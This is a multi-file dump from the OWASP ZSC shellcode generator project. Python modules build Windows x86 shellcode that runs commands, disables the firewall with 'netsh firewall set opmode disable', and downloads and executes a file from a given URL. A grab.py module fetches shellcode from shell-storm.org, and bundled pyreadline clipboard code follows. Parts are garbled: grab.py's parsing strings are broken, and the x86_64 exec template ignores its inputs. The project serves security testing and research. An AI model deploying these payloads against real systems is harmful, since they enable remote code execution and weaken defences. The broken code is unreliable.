0x1c(%edx),%esi 43 | add %ebx,%esi 44 | mov (%esi,%ecx,4),%edx 45 | add %ebx,%edx 46 | xor %esi,%esi 47 | mov %edx,%esi 48 | 
xor %ecx,%ecx 49 | push %ecx 50 | push $0x41797261 51 | push $0x7262694c 52 | push $0x64616f4c 53 | push %esp 54 | push %ebx 55 | call *%edx 56 | xor %ecx,%ecx 57 | mov $0x6c6c,%cx 58 | push %ecx 59 | push $0x642e7472 60 | push $0x6376736d 61 | push %esp 62 | call *%eax 63 | xor %edi,%edi 64 | mov %eax,%edi 65 | xor %edx,%edx 66 | push %edx 67 | mov $0x6d65,%dx 68 | push %edx 69 | push $0x74737973 70 | mov %esp,%ecx 71 | push %ecx 72 | push %edi 73 | xor %edx,%edx 74 | mov %esi,%edx 75 | call *%edx 76 | xor %ecx,%ecx 77 | {0} 78 | push %esp 79 | call *%eax 80 | xor %edx,%edx 81 | push %edx 82 | push $0x74697865 83 | mov %esp,%ecx 84 | push %ecx 85 | push %edi 86 | call *%esi 87 | xor %ecx,%ecx 88 | push %ecx 89 | call *%eax 90 | '''.format(create_command) 91 | 92 | 93 | def run(data): 94 | file_to_create = data[0] 95 | file_content = data[1] 96 | return create_file(stack.generate("echo " + file_content + ">" + 97 | file_to_create, "%ecx", "string")) 98 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/dir_create.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def dir_create(directory_to_create, dir_name): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl 
$0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | push $0x4179726f 52 | push $0x74636572 53 | push $0x69446574 54 | push $0x61657243 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x10,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | push %ecx 68 | push %ebx 69 | call *%eax 70 | add ${1},%esp 71 | pop %edx 72 | pop %ebx 73 | xor %ecx,%ecx 74 | mov $0x61737365,%ecx 75 | push %ecx 76 | subl $0x61,0x3(%esp) 77 | push $0x636f7250 78 | push $0x74697845 79 | push %esp 80 | push %ebx 81 | call *%edx 82 | xor %ecx,%ecx 83 | push %ecx 84 | call *%eax 85 | '''.format(directory_to_create, 86 | hex(int(8 + 4 * (ceil(len(dir_name) / float(4)))))) 87 | 88 | 89 | def run(data): 90 | directory_to_create = data[0] 91 | return dir_create( 92 | stack.generate(directory_to_create, "%ecx", "string"), 93 | directory_to_create) 94 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/disable_firewall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def disable_firewall(command): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 
| xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | mov $0x61636578,%ecx 52 | push %ecx 53 | subl $0x61,0x3(%esp) 54 | push $0x456e6957 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x8,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | inc %ecx 68 | push %ecx 69 | push %ebx 70 | call *%eax 71 | add $0x2c,%esp 72 | pop %edx 73 | pop %ebx 74 | xor %ecx,%ecx 75 | mov $0x61737365,%ecx 76 | push %ecx 77 | subl $0x61,0x3(%esp) 78 | push $0x636f7250 79 | push $0x74697845 80 | push %esp 81 | push %ebx 82 | call *%edx 83 | xor %ecx,%ecx 84 | push %ecx 85 | call *%eax 86 | '''.format(command) 87 | 88 | 89 | def run(data): 90 | command = "netsh firewall set opmode disable" 91 | return disable_firewall(stack.generate(command, "%ecx", "string")) 92 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/download_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 
11 | 12 | def download_exec(url, filename): 13 | return ''' 14 | xor %ecx,%ecx 15 | mov %fs:0x30(%ecx),%eax 16 | mov 0xc(%eax),%eax 17 | mov 0x14(%eax),%esi 18 | lods %ds:(%esi),%eax 19 | xchg %eax,%esi 20 | lods %ds:(%esi),%eax 21 | mov 0x10(%eax),%ebx 22 | mov 0x3c(%ebx),%edx 23 | add %ebx,%edx 24 | mov 0x78(%edx),%edx 25 | add %ebx,%edx 26 | mov 0x20(%edx),%esi 27 | add %ebx,%esi 28 | xor %ecx,%ecx 29 | inc %ecx 30 | lods %ds:(%esi),%eax 31 | add %ebx,%eax 32 | cmpl $0x50746547,(%eax) 33 | jne 23 <.text+0x23> 34 | cmpl $0x41636f72,0x4(%eax) 35 | jne 23 <.text+0x23> 36 | cmpl $0x65726464,0x8(%eax) 37 | jne 23 <.text+0x23> 38 | mov 0x24(%edx),%esi 39 | add %ebx,%esi 40 | mov (%esi,%ecx,2),%cx 41 | dec %ecx 42 | mov 0x1c(%edx),%esi 43 | add %ebx,%esi 44 | mov (%esi,%ecx,4),%edx 45 | add %ebx,%edx 46 | xor %esi,%esi 47 | mov %edx,%esi 48 | xor %ecx,%ecx 49 | push %ecx 50 | push $0x41797261 51 | push $0x7262694c 52 | push $0x64616f4c 53 | push %esp 54 | push %ebx 55 | call *%edx 56 | xor %ecx,%ecx 57 | mov $0x6c6c,%cx 58 | push %ecx 59 | push $0x642e6e6f 60 | push $0x6d6c7275 61 | push %esp 62 | call *%eax 63 | xor %ecx,%ecx 64 | push %ecx 65 | mov $0x4165,%cx 66 | push %ecx 67 | push $0x6c69466f 68 | push $0x5464616f 69 | push $0x6c6e776f 70 | push $0x444c5255 71 | mov %esp,%ecx 72 | push %ecx 73 | push %eax 74 | call *%esi 75 | xor %ecx,%ecx 76 | push %ecx 77 | {0} 78 | xor %edi,%edi 79 | mov %esp,%edi 80 | xor %ecx,%ecx 81 | push %ecx 82 | {1} 83 | xor %edx,%edx 84 | mov %esp,%edx 85 | xor %ecx,%ecx 86 | push %ecx 87 | push %ecx 88 | push %edx 89 | push %edi 90 | push %ecx 91 | call *%eax 92 | xor %ecx,%ecx 93 | push %ecx 94 | push $0x63657890 95 | pop %ecx 96 | shr $0x8,%ecx 97 | push %ecx 98 | push $0x456e6957 99 | xor %ecx,%ecx 100 | push %esp 101 | push %ebx 102 | call *%esi 103 | xor %ecx,%ecx 104 | push %ecx 105 | {1} 106 | xor %edx,%edx 107 | mov %esp,%edx 108 | inc %ecx 109 | push %ecx 110 | push %edx 111 | call *%eax 112 | xor %ecx,%ecx 113 | push %ecx 
114 | push $0x73736590 115 | pop %ecx 116 | shr $0x8,%ecx 117 | push %ecx 118 | push $0x636f7250 119 | push $0x74697845 120 | push %esp 121 | push %ebx 122 | call *%esi 123 | xor %ecx,%ecx 124 | push %ecx 125 | call *%eax 126 | '''.format(url, filename) 127 | 128 | 129 | def run(data): 130 | url = data[0] 131 | filename = data[1] 132 | return download_exec( 133 | stack.generate(url, "%ecx", "string"), stack.generate(filename, "%ecx", 134 | "string")) 135 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/download_tofile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def download_tofile(url, filename): 13 | return ''' 14 | xor %ecx,%ecx 15 | mov %fs:0x30(%ecx),%eax 16 | mov 0xc(%eax),%eax 17 | mov 0x14(%eax),%esi 18 | lods %ds:(%esi),%eax 19 | xchg %eax,%esi 20 | lods %ds:(%esi),%eax 21 | mov 0x10(%eax),%ebx 22 | mov 0x3c(%ebx),%edx 23 | add %ebx,%edx 24 | mov 0x78(%edx),%edx 25 | add %ebx,%edx 26 | mov 0x20(%edx),%esi 27 | add %ebx,%esi 28 | xor %ecx,%ecx 29 | inc %ecx 30 | lods %ds:(%esi),%eax 31 | add %ebx,%eax 32 | cmpl $0x50746547,(%eax) 33 | jne 23 <.text+0x23> 34 | cmpl $0x41636f72,0x4(%eax) 35 | jne 23 <.text+0x23> 36 | cmpl $0x65726464,0x8(%eax) 37 | jne 23 <.text+0x23> 38 | mov 0x24(%edx),%esi 39 | add %ebx,%esi 40 | mov (%esi,%ecx,2),%cx 41 | dec %ecx 42 | mov 0x1c(%edx),%esi 43 | add %ebx,%esi 44 | mov (%esi,%ecx,4),%edx 45 | add %ebx,%edx 46 | xor %esi,%esi 47 | mov %edx,%esi 48 | xor %ecx,%ecx 49 | push %ecx 50 | push $0x41797261 51 | push $0x7262694c 52 | push $0x64616f4c 53 | push %esp 54 | push %ebx 55 | call *%edx 56 | xor %ecx,%ecx 57 | mov 
$0x6c6c,%cx 58 | push %ecx 59 | push $0x642e6e6f 60 | push $0x6d6c7275 61 | push %esp 62 | call *%eax 63 | xor %ecx,%ecx 64 | push %ecx 65 | mov $0x4165,%cx 66 | push %ecx 67 | push $0x6c69466f 68 | push $0x5464616f 69 | push $0x6c6e776f 70 | push $0x444c5255 71 | mov %esp,%ecx 72 | push %ecx 73 | push %eax 74 | call *%esi 75 | xor %ecx,%ecx 76 | push %ecx 77 | {0} 78 | xor %edi,%edi 79 | mov %esp,%edi 80 | xor %ecx,%ecx 81 | push %ecx 82 | {1} 83 | xor %edx,%edx 84 | mov %esp,%edx 85 | xor %ecx,%ecx 86 | push %ecx 87 | push %ecx 88 | push %edx 89 | push %edi 90 | push %ecx 91 | call *%eax 92 | xor %ecx,%ecx 93 | push %ecx 94 | push $0x73736590 95 | pop %ecx 96 | shr $0x8,%ecx 97 | push %ecx 98 | push $0x636f7250 99 | push $0x74697845 100 | push %esp 101 | push %ebx 102 | call *%esi 103 | xor %ecx,%ecx 104 | push %ecx 105 | call *%eax 106 | '''.format(url, filename) 107 | 108 | 109 | def run(data): 110 | url = data[0] 111 | filename = data[1] 112 | return download_tofile( 113 | stack.generate(url, "%ecx", "string"), stack.generate(filename, "%ecx", 114 | "string")) 115 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def exc(file_to_exec, file_name): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add 
%ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | mov $0x61636578,%ecx 52 | push %ecx 53 | subl $0x61,0x3(%esp) 54 | push $0x456e6957 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x8,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | inc %ecx 68 | push %ecx 69 | push %ebx 70 | call *%eax 71 | add ${1},%esp 72 | pop %edx 73 | pop %ebx 74 | xor %ecx,%ecx 75 | mov $0x61737365,%ecx 76 | push %ecx 77 | subl $0x61,0x3(%esp) 78 | push $0x636f7250 79 | push $0x74697845 80 | push %esp 81 | push %ebx 82 | call *%edx 83 | xor %ecx,%ecx 84 | push %ecx 85 | call *%eax 86 | '''.format(file_to_exec, hex(int(8 + 4 * (ceil(len(file_name) / float(4)))))) 87 | 88 | 89 | def run(data): 90 | file_to_exec = data[0] 91 | return exc(stack.generate(file_to_exec, "%ecx", "string"), file_to_exec) 92 | -------------------------------------------------------------------------------- /lib/generator/windows_x86_64/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/windows_x86_64/exec.py: 
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core import stack
from math import ceil


def exc(file_to_exec, file_name):
    """Return the AT&T-syntax x86-64 listing for this generator as text.

    file_to_exec -- text produced by stack.generate() in run(); passed as
                    the first str.format() argument.
    file_name    -- the raw string from the caller; only its length is
                    used, to compute the second str.format() argument
                    (8 plus the length rounded up to a multiple of 4,
                    rendered with hex()).

    NOTE(review): the template below contains no ``{0}`` or ``{1}``
    replacement field, so str.format() discards both arguments and the
    returned text is identical for every input. The 32-bit exc() in
    windows_x86/exec.py does reference both fields; confirm whether this
    variant is unfinished before relying on its output.
    """
    return '''
sub $0x20,%rsp
and $0xfffffffffffffff0,%rsp
mov %gs:0x60,%r12
mov 0x18(%r12),%r12
mov 0x20(%r12),%r12
mov (%r12),%r12
mov 0x20(%r12),%r15
mov (%r12),%r12
mov 0x20(%r12),%r12
mov $0xe8afe98,%rdx
mov %r12,%rcx
mov %r12,%r12
callq 0x401067
jmp 0x401059
pop %rcx
mov $0x1,%edx
callq *%rax
mov $0x2d3fcd70,%edx
mov %r15,%rcx
callq 0x401067
xor %rcx,%rcx
callq *%rax
callq 0x40103f
movslq 0x6c(%rcx),%esp
movslq (%rsi),%ebp
gs js 0x4010cb
add %cl,-0x77(%rcx)
int $0x67
mov 0x3c(%r13),%eax
mov 0x88(%r13d,%eax,1),%r14d
add %r13d,%r14d
mov 0x18(%r14d),%r10d
mov 0x20(%r14d),%ebx
add %r13d,%ebx
jecxz 0x4010ca
dec %r10d
mov (%ebx,%r10d,4),%esi
add %r13d,%esi
xor %edi,%edi
xor %eax,%eax
cld
lodsb %ds:(%rsi),%al
test %al,%al
je 0x4010a7
ror $0xd,%edi
add %eax,%edi
jmp 0x40109b
cmp %edx,%edi
jne 0x401088
mov 0x24(%r14d),%ebx
add %r13d,%ebx
xor %ecx,%ecx
mov (%ebx,%r10d,2),%cx
mov 0x1c(%r14d),%ebx
add %r13d,%ebx
mov (%ebx,%ecx,4),%eax
add %r13d,%eax
retq
add %al,(%rax)
add %al,(%rax)
'''.format(file_to_exec, hex(int(8 + 4 * (ceil(len(file_name) / float(4))))))


def run(data):
    """Entry point for this generator: build the listing for data[0].

    data[0] is passed through stack.generate(..., "%rcx", "string") and the
    result, together with the raw string, is handed to exc(). Other
    elements of data are not read.
    """
    file_to_exec = data[0]
    return exc(stack.generate(file_to_exec, "%rcx", "string"), file_to_exec)

--------------------------------------------------------------------------------
/lib/opcoder/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''

pass

--------------------------------------------------------------------------------
/lib/shell_storm_api/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''

pass

--------------------------------------------------------------------------------
/lib/shell_storm_api/grab.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
# Security notes for this module (review):
#   * Every URL below uses plain http://, so responses are neither
#     authenticated nor integrity-protected in transit.
#   * The fetched text is printed and, on request, written to a
#     caller-chosen path via downloaded_file_output(); nothing visible in
#     this file verifies the content first. Treat the output as untrusted.
#   * `version() is 2` / `is 3` compare ints by identity. That relies on
#     CPython's small-int caching and triggers a SyntaxWarning on
#     Python 3.8+; `==` is the reliable comparison.
from core.compatible import *
from core.alert import *
from core import color
from core.get_input import _input
from core.file_out import downloaded_file_output
# version() is not defined in this file; presumably it comes from the
# core.compatible star import -- TODO confirm.
if version() is 2:
	from urllib import urlopen
	from HTMLParser import HTMLParser
if version() is 3:
	from urllib.request import urlopen
	import html

def _html_decode(data):
	"""HTML Decode function separate to handle py2 and py3.

	Returns the unescaped text. If version() is neither 2 nor 3 the
	function falls off the end and returns None.
	"""
	if version() is 2:
		h = HTMLParser()
		return h.unescape(data)
	if version() is 3:
		return html.unescape(data)

def _search_shellcode(cli,keyword):
	"""Query the shell-storm search API and print one line per result.

	cli     -- when it is True, `keyword` is used as passed; otherwise the
	           keyword is read interactively with _input().
	keyword -- search text; spaces are replaced with '*' before it is
	           appended to the URL.

	Returns None. Any exception while fetching or decoding is reported as
	'connection error' and ends the call.
	"""
	url = 'http://shell-storm.org/api/?s='
	if cli is True:
		pass
	else:
		keyword = _input('%skeyword_to_search%s' %
			(color.color('blue'), color.color('yellow')), 'any', True)
	# NOTE(review): only spaces are rewritten; the keyword is otherwise
	# concatenated into the query string without URL-encoding.
	keyword = keyword.replace(' ', '*')
	try:
		data = urlopen(url + keyword).read()
		if version() is 3:
			data = data.decode('utf-8')
	except:
		# Bare except: decode errors and similar failures are reported as
		# a connection problem too.
		warn('connection error')
		return
	# Each response line is split on '::::'; by the format string below the
	# fields are [0] author, [1] platform, [2] title, [3] id.
	for shellcode_ in data.rsplit('\n'):
		try:
			shellcode_ = shellcode_.rsplit('::::')
			# NOTE(review): the fields come straight from the HTTP response;
			# confirm info() neutralises terminal control sequences.
			info('author: %s\tshellcode_id: %s\tplatform: %s\ttitle: %s\n' %
				(shellcode_[0], shellcode_[3], shellcode_[1], shellcode_[2]))
		except:
			# Lines with fewer than four fields are skipped silently.
			pass
	write('\n')


def _download_shellcode(cli,id,name):
	"""Fetch one shell-storm entry by id, print it, and optionally save it.

	cli  -- when it is True, `id` and `name` are used as passed; otherwise
	        the id is read interactively with _input().
	id   -- entry identifier substituted into the download URL (shadows
	        the builtin of the same name).
	name -- in the non-interactive branch, a non-empty value is the path
	        handed to downloaded_file_output().

	Returns None. Any exception inside the fetch/parse step is reported as
	'connection error'.
	"""
	if cli is True:
		pass
	else:
		id = _input('%sshellcode_id%s' %
			(color.color('blue'), color.color('yellow')), 'int', True)
	url = 'http://shell-storm.org/shellcode/files/shellcode-%s.php' % (str(id))
	# NOTE(review): the separator literals in the two rsplit() chains below
	# look truncated by page extraction (a line break inside a quoted string
	# and an empty separator, which str.rsplit rejects). Restore them from
	# the upstream file before running this code.
	# The bare except also covers the [1]/[0] indexing, so an unexpected
	# page layout is reported as a connection error.
	try:
		if version() is 2:
			data = urlopen(url).read().rsplit('
')[1].rsplit('')[0]
		if version() is 3:
			data = urlopen(url).read().decode('utf-8').rsplit('
')[
				1].rsplit('')[0]
	except:
		warn('connection error\n')
		return

	write(_html_decode(data) + '\n\n')

	# The decoded remote text is written unchanged to a path taken from the
	# prompt or from `name`; no path or content validation happens here, and
	# what downloaded_file_output() does with either is not visible in this
	# file.
	if cli is False:
		file_or_not = _input('Shellcode output to a .c file?(y or n)', 'any', True)
		if file_or_not[0] == 'y':
			target = _input('Target .c file?', 'any', True)
			downloaded_file_output(target, _html_decode(data))
	else:
		if name != '':
			downloaded_file_output(name, _html_decode(data))
			
82 | def _grab_all():
83 | 	url = 'http://shell-storm.org/shellcode/'
84 | 	try:
85 | 		if version() is 2:
86 | 			data = urlopen(url).read().rsplit('\n')
87 | 		if version() is 3:
88 | 			data = urlopen(url).read().decode('utf-8').rsplit('\n')
89 | 	except:
90 | 		warn('connection error\n')
91 | 		return
92 | 	for shellcode in data:
93 | 		if '/shellcode/files/shellcode-' in shellcode:
94 | 			id = shellcode.rsplit('
  • ')[1].rsplit('')[0] 96 | author = shellcode.rsplit('')[1].rsplit('')[0] 97 | info('id: ' + id + ' - ' + title + ' ' + author + '\n') 98 | -------------------------------------------------------------------------------- /module/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /module/readline_osx/README.md: -------------------------------------------------------------------------------- 1 | https://pypi.python.org/pypi/readline/2.6.4 -------------------------------------------------------------------------------- /module/readline_osx/readline.py: -------------------------------------------------------------------------------- 1 | def __bootstrap__(): 2 | global __bootstrap__, __loader__, __file__ 3 | import sys, pkg_resources, imp 4 | __file__ = pkg_resources.resource_filename(__name__, 'readline.so') 5 | __loader__ = None 6 | del __bootstrap__, __loader__ 7 | imp.load_dynamic(__name__, __file__) 8 | 9 | 10 | __bootstrap__() 11 | -------------------------------------------------------------------------------- /module/readline_osx/readline.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OWASP/ZSC/f763deab754e5bb355c65d5eb90dbbbfc2a5d58a/module/readline_osx/readline.so -------------------------------------------------------------------------------- /module/readline_windows/README.md: -------------------------------------------------------------------------------- 1 | http://pypi.python.org/pypi/pyreadline -------------------------------------------------------------------------------- 
/module/readline_windows/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #***************************************************************************** 3 | # Copyright (C) 2003-2006 Gary Bishop. 4 | # Copyright (C) 2006 Jorgen Stenarson. 5 | # 6 | # Distributed under the terms of the BSD License. The full license is in 7 | # the file COPYING, distributed as part of this software. 8 | #***************************************************************************** 9 | from __future__ import print_function, unicode_literals, absolute_import 10 | 11 | from . import unicode_helper 12 | from . import logger, clipboard, lineeditor, modes, console 13 | from .rlmain import * 14 | from . 
import rlmain 15 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/clipboard/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function, unicode_literals, absolute_import 2 | import sys 3 | success = True 4 | in_ironpython = "IronPython" in sys.version 5 | if in_ironpython: 6 | try: 7 | from .ironpython_clipboard import GetClipboardText, SetClipboardText 8 | except ImportError: 9 | from .no_clipboard import GetClipboardText, SetClipboardText 10 | 11 | else: 12 | try: 13 | from .win32_clipboard import GetClipboardText, SetClipboardText 14 | except ImportError: 15 | from .no_clipboard import GetClipboardText, SetClipboardText 16 | 17 | 18 | def send_data(lists): 19 | SetClipboardText(make_tab(lists)) 20 | 21 | 22 | def set_clipboard_text(toclipboard): 23 | SetClipboardText(str(toclipboard)) 24 | 25 | 26 | def make_tab(lists): 27 | if hasattr(lists, "tolist"): 28 | lists = lists.tolist() 29 | ut = [] 30 | for rad in lists: 31 | if type(rad) in [list, tuple]: 32 | ut.append("\t".join(["%s" % x for x in rad])) 33 | else: 34 | ut.append("%s" % rad) 35 | return "\n".join(ut) 36 | 37 | 38 | def make_list_of_list(txt): 39 | def make_num(x): 40 | try: 41 | return int(x) 42 | except ValueError: 43 | try: 44 | return float(x) 45 | except ValueError: 46 | try: 47 | return complex(x) 48 | except ValueError: 49 | return x 50 | return x 51 | 52 | ut = [] 53 | flag = False 54 | for rad in [x for x in txt.split("\r\n") if x != ""]: 55 | raden = [make_num(x) for x in rad.split("\t")] 56 | if str in list(map(type, raden)): 57 | flag = True 58 | ut.append(raden) 59 | return ut, flag 60 | 61 | 62 | def get_clipboard_text_and_convert(paste_list=False): 63 | """Get txt from clipboard. if paste_list==True the convert tab separated 64 | data to list of lists. 
Enclose list of list in array() if all elements are 65 | numeric""" 66 | txt = GetClipboardText() 67 | if txt: 68 | if paste_list and "\t" in txt: 69 | array, flag = make_list_of_list(txt) 70 | if flag: 71 | txt = repr(array) 72 | else: 73 | txt = "array(%s)" % repr(array) 74 | txt = "".join([c for c in txt if c not in " \t\r\n"]) 75 | return txt 76 | -------------------------------------------------------------------------------- /module/readline_windows/pyreadline/clipboard/ironpython_clipboard.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #***************************************************************************** 3 | # Copyright (C) 2006 Jorgen Stenarson. 4 | # 5 | # Distributed under the terms of the BSD License. The full license is in 6 | # the file COPYING, distributed as part of this software. 7 | #***************************************************************************** 8 | from __future__ import print_function, unicode_literals, absolute_import 9 | import clr 10 | clr.AddReferenceByPartialName("System.Windows.Forms") 11 | import System.Windows.Forms.Clipboard as cb 12 | 13 | 14 | def GetClipboardText(): 